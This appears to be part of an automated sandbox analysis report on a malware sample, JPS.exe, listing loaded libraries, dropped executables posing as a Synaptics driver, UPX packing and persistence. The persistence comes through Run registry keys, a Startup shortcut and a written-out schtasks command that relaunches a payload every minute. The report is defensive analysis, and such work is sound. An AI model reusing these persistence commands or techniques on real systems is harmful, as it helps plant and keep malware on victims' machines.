                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\JPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: BQQQVU.lnk.2.drLNK file: ..\..\..\..\..\Windata\XNLAGO.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\KucYdd8.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: JPS.exeStatic file information: File size 1989120 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: JPS.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13b200
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00C3C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00C3C140
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A98D99 push edi; retn 0000h2_2_00A98D9B
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A98F0E push F7FFFFFFh; retn 0000h2_2_00A98F13
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB7795 push ecx; ret 2_2_00AB77A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C167D9 push FEFC08C1h; ret 3_2_08C1679A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C167D9 push FEFC08C1h; ret 3_2_08C167E2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C16670 push FEFC08C1h; ret 3_2_08C1679A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C16801 push FEFC08C1h; ret 3_2_08C16806
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C1679B push FEFC08C1h; ret 3_2_08C1679A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C1679B push FEFC08C1h; ret 3_2_08C167BE
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00738D99 push edi; retn 0000h10_2_00738D9B
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00738F0E push F7FFFFFFh; retn 0000h10_2_00738F13
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00757795 push ecx; ret 10_2_007577A8
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\Users\user\Desktop\._cache_JPS.exeJump to dropped file
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\ProgramData\Synaptics\RCX5246.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_JPS.exeFile created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\ProgramData\Synaptics\RCX5246.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_JPS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnkJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnkJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQQQVUJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQQQVUJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00AAF78E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00AF7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0074F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00797F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00797F0E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00AB1E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
